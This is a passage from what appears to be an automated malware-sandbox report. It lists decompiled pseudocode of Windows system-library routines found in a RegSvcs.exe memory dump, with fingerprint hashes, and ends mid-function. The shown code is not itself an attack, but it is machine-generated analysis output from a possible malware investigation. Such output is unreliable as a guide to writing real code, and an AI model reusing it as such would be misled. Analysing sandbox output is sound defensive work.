                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                          • Instruction ID: 4d9764b752f76c1a71d475c59111bd205d13b1b01098ad64c212f95217868a95
                                          • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                          • Instruction Fuzzy Hash: D311C432A056958FE72BAB6CC944B357BECEF4179CF0D80A0ED4487A96E72CD841C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E0130766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                          				char _v8;
                                          				void* _t22;
                                          				void* _t24;
                                          				intOrPtr _t29;
                                          				intOrPtr* _t30;
                                          				void* _t42;
                                          				intOrPtr _t47;
                                          
                                          				_push(__ecx);
                                          				_t36 =  &_v8;
                                          				if(E0132F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                          					L10:
                                          					_t22 = 0;
                                          				} else {
                                          					_t24 = _v8 + __ecx;
                                          					_t42 = _t24;
                                          					if(_t24 < __ecx) {
                                          						goto L10;
                                          					} else {
                                          						if(E0132F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                          							goto L10;
                                          						} else {
                                          							_t29 = _v8 + _t42;
                                          							if(_t29 < _t42) {
                                          								goto L10;
                                          							} else {
                                          								_t47 = _t29;
                                          								_t30 = _a16;
                                          								if(_t30 != 0) {
                                          									 *_t30 = _t47;
                                          								}
                                          								if(_t47 == 0) {
                                          									goto L10;
                                          								} else {
                                          									_t22 = L01314620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t22;
                                          			}











                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                          • Instruction ID: 0a3b4c0b568fedf25cddb7629676743a5fe639de1eb2d8509992f0242aa056ee
                                          • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                          • Instruction Fuzzy Hash: 5F01D432B1011DABC7219E5ECC60E5B7BEDEB84674B280524BA4ADF280DA31EC01C3A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 69%
                                          			E012F9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                          				intOrPtr* _t51;
                                          				intOrPtr _t59;
                                          				signed int _t64;
                                          				signed int _t67;
                                          				signed int* _t71;
                                          				signed int _t74;
                                          				signed int _t77;
                                          				signed int _t82;
                                          				intOrPtr* _t84;
                                          				void* _t85;
                                          				intOrPtr* _t87;
                                          				void* _t94;
                                          				signed int _t95;
                                          				intOrPtr* _t97;
                                          				signed int _t99;
                                          				signed int _t102;
                                          				void* _t104;
                                          
                                          				_push(__ebx);
                                          				_push(__esi);
                                          				_push(__edi);
                                          				_t97 = __ecx;
                                          				_t102 =  *(__ecx + 0x14);
                                          				if((_t102 & 0x02ffffff) == 0x2000000) {
                                          					_t102 = _t102 | 0x000007d0;
                                          				}
                                          				_t48 =  *[fs:0x30];
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                          					_t102 = _t102 & 0xff000000;
                                          				}
                                          				_t80 = 0x13e85ec;
                                          				E01312280(_t48, 0x13e85ec);
                                          				_t51 =  *_t97 + 8;
                                          				if( *_t51 != 0) {
                                          					L6:
                                          					return E0130FFB0(_t80, _t97, _t80);
                                          				} else {
                                          					 *(_t97 + 0x14) = _t102;
                                          					_t84 =  *0x13e538c; // 0x77e46828
                                          					if( *_t84 != 0x13e5388) {
                                          						_t85 = 3;
                                          						asm("int 0x29");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						_push(0x2c);
                                          						_push(0x13cf6e8);
                                          						E0134D0E8(0x13e85ec, _t97, _t102);
                                          						 *((char*)(_t104 - 0x1d)) = 0;
                                          						_t99 =  *(_t104 + 8);
                                          						__eflags = _t99;
                                          						if(_t99 == 0) {
                                          							L13:
                                          							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                          							if(__eflags == 0) {
                                          								E013C88F5(_t80, _t85, 0x13e5388, _t99, _t102, __eflags);
                                          							}
                                          						} else {
                                          							__eflags = _t99 -  *0x13e86c0; // 0xe907b0
                                          							if(__eflags == 0) {
                                          								goto L13;
                                          							} else {
                                          								__eflags = _t99 -  *0x13e86b8; // 0x0
                                          								if(__eflags == 0) {
                                          									goto L13;
                                          								} else {
                                          									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                          									__eflags =  *((char*)(_t59 + 0x28));
                                          									if( *((char*)(_t59 + 0x28)) == 0) {
                                          										E01312280(_t99 + 0xe0, _t99 + 0xe0);
                                          										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                          										__eflags =  *((char*)(_t99 + 0xe5));
                                          										if(__eflags != 0) {
                                          											E013C88F5(0x13e85ec, _t85, 0x13e5388, _t99, _t102, __eflags);
                                          										} else {
                                          											__eflags =  *((char*)(_t99 + 0xe4));
                                          											if( *((char*)(_t99 + 0xe4)) == 0) {
                                          												 *((char*)(_t99 + 0xe4)) = 1;
                                          												_push(_t99);
                                          												_push( *((intOrPtr*)(_t99 + 0x24)));
                                          												E0133AFD0();
                                          											}
                                          											while(1) {
                                          												_t71 = _t99 + 8;
                                          												 *(_t104 - 0x2c) = _t71;
                                          												_t80 =  *_t71;
                                          												_t95 = _t71[1];
                                          												 *(_t104 - 0x28) = _t80;
                                          												 *(_t104 - 0x24) = _t95;
                                          												while(1) {
                                          													L19:
                                          													__eflags = _t95;
                                          													if(_t95 == 0) {
                                          														break;
                                          													}
                                          													_t102 = _t80;
                                          													 *(_t104 - 0x30) = _t95;
                                          													 *(_t104 - 0x24) = _t95 - 1;
                                          													asm("lock cmpxchg8b [edi]");
                                          													_t80 = _t102;
                                          													 *(_t104 - 0x28) = _t80;
                                          													 *(_t104 - 0x24) = _t95;
                                          													__eflags = _t80 - _t102;
                                          													_t99 =  *(_t104 + 8);
                                          													if(_t80 != _t102) {
                                          														continue;
                                          													} else {
                                          														__eflags = _t95 -  *(_t104 - 0x30);
                                          														if(_t95 !=  *(_t104 - 0x30)) {
                                          															continue;
                                          														} else {
                                          															__eflags = _t95;
                                          															if(_t95 != 0) {
                                          																_t74 = 0;
                                          																 *(_t104 - 0x34) = 0;
                                          																_t102 = 0;
                                          																__eflags = 0;
                                          																while(1) {
                                          																	 *(_t104 - 0x3c) = _t102;
                                          																	__eflags = _t102 - 3;
                                          																	if(_t102 >= 3) {
                                          																		break;
                                          																	}
                                          																	__eflags = _t74;
                                          																	if(_t74 != 0) {
                                          																		L49:
                                          																		_t102 =  *_t74;
                                          																		__eflags = _t102;
                                          																		if(_t102 != 0) {
                                          																			_t102 =  *(_t102 + 4);
                                          																			__eflags = _t102;
                                          																			if(_t102 != 0) {
                                          																				 *0x13eb1e0(_t74, _t99);
                                          																				 *_t102();
                                          																			}
                                          																		}
                                          																		do {
                                          																			_t71 = _t99 + 8;
                                          																			 *(_t104 - 0x2c) = _t71;
                                          																			_t80 =  *_t71;
                                          																			_t95 = _t71[1];
                                          																			 *(_t104 - 0x28) = _t80;
                                          																			 *(_t104 - 0x24) = _t95;
                                          																			goto L19;
                                          																		} while (_t74 == 0);
                                          																		goto L49;
                                          																	} else {
                                          																		_t82 = 0;
                                          																		__eflags = 0;
                                          																		while(1) {
                                          																			 *(_t104 - 0x38) = _t82;
                                          																			__eflags = _t82 -  *0x13e84c0;
                                          																			if(_t82 >=  *0x13e84c0) {
                                          																				break;
                                          																			}
                                          																			__eflags = _t74;
                                          																			if(_t74 == 0) {
                                          																				_t77 = E013C9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                          																				__eflags = _t77;
                                          																				if(_t77 == 0) {
                                          																					_t74 = 0;
                                          																					__eflags = 0;
                                          																				} else {
                                          																					_t74 = _t77 + 0xfffffff4;
                                          																				}
                                          																				 *(_t104 - 0x34) = _t74;
                                          																				_t82 = _t82 + 1;
                                          																				continue;
                                          																			}
                                          																			break;
                                          																		}
                                          																		_t102 = _t102 + 1;
                                          																		continue;
                                          																	}
                                          																	goto L20;
                                          																}
                                          																__eflags = _t74;
                                          															}
                                          														}
                                          													}
                                          													break;
                                          												}
                                          												L20:
                                          												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                          												 *((char*)(_t99 + 0xe5)) = 1;
                                          												 *((char*)(_t104 - 0x1d)) = 1;
                                          												goto L21;
                                          											}
                                          										}
                                          										L21:
                                          										 *(_t104 - 4) = 0xfffffffe;
                                          										E012F922A(_t99);
                                          										_t64 = E01317D50();
                                          										__eflags = _t64;
                                          										if(_t64 != 0) {
                                          											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          										} else {
                                          											_t67 = 0x7ffe0386;
                                          										}
                                          										__eflags =  *_t67;
                                          										if( *_t67 != 0) {
                                          											_t67 = E013C8B58(_t99);
                                          										}
                                          										__eflags =  *((char*)(_t104 - 0x1d));
                                          										if( *((char*)(_t104 - 0x1d)) != 0) {
                                          											__eflags = _t99 -  *0x13e86c0; // 0xe907b0
                                          											if(__eflags != 0) {
                                          												__eflags = _t99 -  *0x13e86b8; // 0x0
                                          												if(__eflags == 0) {
                                          													_t94 = 0x13e86bc;
                                          													_t87 = 0x13e86b8;
                                          													goto L27;
                                          												} else {
                                          													__eflags = _t67 | 0xffffffff;
                                          													asm("lock xadd [edi], eax");
                                          													if(__eflags == 0) {
                                          														E012F9240(_t80, _t99, _t99, _t102, __eflags);
                                          													}
                                          												}
                                          											} else {
                                          												_t94 = 0x13e86c4;
                                          												_t87 = 0x13e86c0;
                                          												L27:
                                          												E01329B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                          											}
                                          										}
                                          									} else {
                                          										goto L13;
                                          									}
                                          								}
                                          							}
                                          						}
                                          						return E0134D130(_t80, _t99, _t102);
                                          					} else {
                                          						 *_t51 = 0x13e5388;
                                          						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                          						 *_t84 = _t51;
                                          						 *0x13e538c = _t51;
                                          						goto L6;
                                          					}
                                          				}
                                          			}





















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d875adde93268fdcade6389191b2929673e68fa44dc9a98204a97913bfe9d2d6
                                          • Instruction ID: c771d14339b705479f38f59b65a0f48c143933b71235cd8409688a79fbfc41c0
                                          • Opcode Fuzzy Hash: d875adde93268fdcade6389191b2929673e68fa44dc9a98204a97913bfe9d2d6
                                          • Instruction Fuzzy Hash: 3001DC72A212018FC72A9F08D840B12BBE9EB81328F21407EE7018B6D2C674DC81CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E0138C450(intOrPtr* _a4) {
                                          				signed char _t25;
                                          				intOrPtr* _t26;
                                          				intOrPtr* _t27;
                                          
                                          				_t26 = _a4;
                                          				_t25 =  *(_t26 + 0x10);
                                          				if((_t25 & 0x00000003) != 1) {
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push( *((intOrPtr*)(_t26 + 8)));
                                          					_push(0);
                                          					_push( *_t26);
                                          					E01339910();
                                          					_t25 =  *(_t26 + 0x10);
                                          				}
                                          				if((_t25 & 0x00000001) != 0) {
                                          					_push(4);
                                          					_t7 = _t26 + 4; // 0x4
                                          					_t27 = _t7;
                                          					_push(_t27);
                                          					_push(5);
                                          					_push(0xfffffffe);
                                          					E013395B0();
                                          					if( *_t27 != 0) {
                                          						_push( *_t27);
                                          						E013395D0();
                                          					}
                                          				}
                                          				_t8 = _t26 + 0x14; // 0x14
                                          				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                          					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                          				}
                                          				_push( *_t26);
                                          				E013395D0();
                                          				return L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                          			}







                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                          • Instruction ID: fee40f4b07e15e90b8659378347cd0eaaeef6f7acc19939246c4208905ac5066
                                          • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                          • Instruction Fuzzy Hash: E4018472140606FFE616AF6DCC80EA2FB6DFB94358F004525F214535A0C761ACA1C7A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E013C4015(signed int __eax, signed int __ecx) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed char _t10;
                                          				signed int _t28;
                                          
                                          				_push(__ecx);
                                          				_t28 = __ecx;
                                          				asm("lock xadd [edi+0x24], eax");
                                          				_t10 = (__eax | 0xffffffff) - 1;
                                          				if(_t10 == 0) {
                                          					_t1 = _t28 + 0x1c; // 0x1e
                                          					E01312280(_t10, _t1);
                                          					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                          					E01312280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x13e86ac);
                                          					E012FF900(0x13e86d4, _t28);
                                          					E0130FFB0(0x13e86ac, _t28, 0x13e86ac);
                                          					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                          					E0130FFB0(0, _t28, _t1);
                                          					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                          					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                          						L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                          					}
                                          					_t10 = L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                          				}
                                          				return _t10;
                                          			}








                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c6a38422f438e55c3b067de0c20eea117fc8e33ac8049dbda1894e205e7aadad
                                          • Instruction ID: 11e9fab25adc66dec3122ec3ce82a3571c6eedfd189a4a0d4ecd05bfd96b704a
                                          • Opcode Fuzzy Hash: c6a38422f438e55c3b067de0c20eea117fc8e33ac8049dbda1894e205e7aadad
                                          • Instruction Fuzzy Hash: CA01F7722416467FC315AB7DCD80E57F7ECFF55668B000229F60883A51CB24EC12CAE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 61%
                                          			E013B138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				short _v54;
                                          				char _v60;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed char* _t21;
                                          				intOrPtr _t27;
                                          				intOrPtr _t33;
                                          				intOrPtr _t34;
                                          				signed int _t35;
                                          
                                          				_t32 = __edx;
                                          				_t27 = __ebx;
                                          				_v8 =  *0x13ed360 ^ _t35;
                                          				_t33 = __edx;
                                          				_t34 = __ecx;
                                          				E0133FA60( &_v60, 0, 0x30);
                                          				_v20 = _a4;
                                          				_v16 = _a8;
                                          				_v28 = _t34;
                                          				_v24 = _t33;
                                          				_v54 = 0x1033;
                                          				if(E01317D50() == 0) {
                                          					_t21 = 0x7ffe0388;
                                          				} else {
                                          					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          				}
                                          				_push( &_v60);
                                          				_push(0x10);
                                          				_push(0x20402);
                                          				_push( *_t21 & 0x000000ff);
                                          				return E0133B640(E01339AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                          			}


















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c142e02149ee177c2f56984833bbbbf69d66035cd05e3a0a999b91a348e74108
                                          • Instruction ID: 0899cda93d16ce6ae7e3368e1e102560fc73c51a876516f77d9b6cfa2036abf2
                                          • Opcode Fuzzy Hash: c142e02149ee177c2f56984833bbbbf69d66035cd05e3a0a999b91a348e74108
                                          • Instruction Fuzzy Hash: 2A015271E0121DAFDB14DFA9D881FAEBBB8EF44714F404056B904EB680E6749A41CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 61%
                                          			E013B14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				short _v54;
                                          				char _v60;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed char* _t21;
                                          				intOrPtr _t27;
                                          				intOrPtr _t33;
                                          				intOrPtr _t34;
                                          				signed int _t35;
                                          
                                          				_t32 = __edx;
                                          				_t27 = __ebx;
                                          				_v8 =  *0x13ed360 ^ _t35;
                                          				_t33 = __edx;
                                          				_t34 = __ecx;
                                          				E0133FA60( &_v60, 0, 0x30);
                                          				_v20 = _a4;
                                          				_v16 = _a8;
                                          				_v28 = _t34;
                                          				_v24 = _t33;
                                          				_v54 = 0x1034;
                                          				if(E01317D50() == 0) {
                                          					_t21 = 0x7ffe0388;
                                          				} else {
                                          					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          				}
                                          				_push( &_v60);
                                          				_push(0x10);
                                          				_push(0x20402);
                                          				_push( *_t21 & 0x000000ff);
                                          				return E0133B640(E01339AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                          			}


















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0dac51584bcd020086b32624dd4d86ec9afc443658e0404c7e387978a61e1aaa
                                          • Instruction ID: 457dad2bf3054337ed61fd0dfa2e10df80385e93a46c56681c42d4063bebb1e9
                                          • Opcode Fuzzy Hash: 0dac51584bcd020086b32624dd4d86ec9afc443658e0404c7e387978a61e1aaa
                                          • Instruction Fuzzy Hash: B2018C71A0024CEFDB14DFACD841FAEBBB8EF84714F444066B914EB280EA70DA01CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E012F58EC(intOrPtr __ecx) {
                                          				signed int _v8;
                                          				char _v28;
                                          				char _v44;
                                          				char _v76;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr _t10;
                                          				intOrPtr _t16;
                                          				intOrPtr _t17;
                                          				intOrPtr _t27;
                                          				intOrPtr _t28;
                                          				signed int _t29;
                                          
                                          				_v8 =  *0x13ed360 ^ _t29;
                                          				_t10 =  *[fs:0x30];
                                          				_t27 = __ecx;
                                          				if(_t10 == 0) {
                                          					L6:
                                          					_t28 = 0x12d5c80;
                                          				} else {
                                          					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                          					if(_t16 == 0) {
                                          						goto L6;
                                          					} else {
                                          						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                          					}
                                          				}
                                          				if(E012F5943() != 0 &&  *0x13e5320 > 5) {
                                          					E01377B5E( &_v44, _t27);
                                          					_t22 =  &_v28;
                                          					E01377B5E( &_v28, _t28);
                                          					_t11 = E01377B9C(0x13e5320, 0x12dbf15,  &_v28, _t22, 4,  &_v76);
                                          				}
                                          				return E0133B640(_t11, _t17, _v8 ^ _t29, 0x12dbf15, _t27, _t28);
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 99c65a0651ef2145b12505665419698b6281ae3a46ff8b4b27e34fe0f3e107f8
                                          • Instruction ID: 3b04081b90fe577b81fab35e3609579138ef6ca3b451013f3278120f008b8a84
                                          • Opcode Fuzzy Hash: 99c65a0651ef2145b12505665419698b6281ae3a46ff8b4b27e34fe0f3e107f8
                                          • Instruction Fuzzy Hash: 1401A235A20609DBD728EA6DD805ABEBBACEF81274F55007DAB059B284DE70DD05C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0130B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                          				signed char _t11;
                                          				signed char* _t12;
                                          				intOrPtr _t24;
                                          				signed short* _t25;
                                          
                                          				_t25 = __edx;
                                          				_t24 = __ecx;
                                          				_t11 = ( *[fs:0x30])[0x50];
                                          				if(_t11 != 0) {
                                          					if( *_t11 == 0) {
                                          						goto L1;
                                          					}
                                          					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                          					L2:
                                          					if( *_t12 != 0) {
                                          						_t12 =  *[fs:0x30];
                                          						if((_t12[0x240] & 0x00000004) == 0) {
                                          							goto L3;
                                          						}
                                          						if(E01317D50() == 0) {
                                          							_t12 = 0x7ffe0385;
                                          						} else {
                                          							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                          						}
                                          						if(( *_t12 & 0x00000020) == 0) {
                                          							goto L3;
                                          						}
                                          						return E01377016(_a4, _t24, 0, 0, _t25, 0);
                                          					}
                                          					L3:
                                          					return _t12;
                                          				}
                                          				L1:
                                          				_t12 = 0x7ffe0384;
                                          				goto L2;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                          • Instruction ID: 5898abbd91d2a85e0635f71c158de53e126648b33b50358d0e85feb0cf733214
                                          • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                          • Instruction Fuzzy Hash: 420184762005849FE327C71CC958F66BBDCEB85B58F0900A1FA15CBA95D738DC40D621
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E013C1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                          				char _v8;
                                          				void* _v11;
                                          				unsigned int _v12;
                                          				void* _v15;
                                          				void* __esi;
                                          				void* __ebp;
                                          				char* _t16;
                                          				signed int* _t35;
                                          
                                          				_t22 = __ebx;
                                          				_t35 = __ecx;
                                          				_v8 = __edx;
                                          				_t13 =  !( *__ecx) + 1;
                                          				_v12 =  !( *__ecx) + 1;
                                          				if(_a4 != 0) {
                                          					E013C165E(__ebx, 0x13e8ae4, (__edx -  *0x13e8b04 >> 0x14) + (__edx -  *0x13e8b04 >> 0x14), __edi, __ecx, (__edx -  *0x13e8b04 >> 0x14) + (__edx -  *0x13e8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                          				}
                                          				E013BAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                          				if(E01317D50() == 0) {
                                          					_t16 = 0x7ffe0388;
                                          				} else {
                                          					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          				}
                                          				if( *_t16 != 0) {
                                          					_t16 = E013AFE3F(_t22, _t35, _v8, _v12);
                                          				}
                                          				return _t16;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1465e4dc0accea78dc8136b3703237b9bea8349647562b785796b5e04536192d
                                          • Instruction ID: 348a1a5f9c94d6a37d34aeaa8a7d4ba78b01bb212f4d7bde9cc21739752fe647
                                          • Opcode Fuzzy Hash: 1465e4dc0accea78dc8136b3703237b9bea8349647562b785796b5e04536192d
                                          • Instruction Fuzzy Hash: DF014772604746DFC720EF2CC944B1A7BE9AF84718F04862DF98583692EE30DC44DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 59%
                                          			E013AFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                          				signed int _v12;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				short _v58;
                                          				char _v64;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed char* _t18;
                                          				intOrPtr _t24;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				signed int _t32;
                                          
                                          				_t29 = __edx;
                                          				_t24 = __ebx;
                                          				_v12 =  *0x13ed360 ^ _t32;
                                          				_t30 = __edx;
                                          				_t31 = __ecx;
                                          				E0133FA60( &_v64, 0, 0x30);
                                          				_v24 = _a4;
                                          				_v32 = _t31;
                                          				_v28 = _t30;
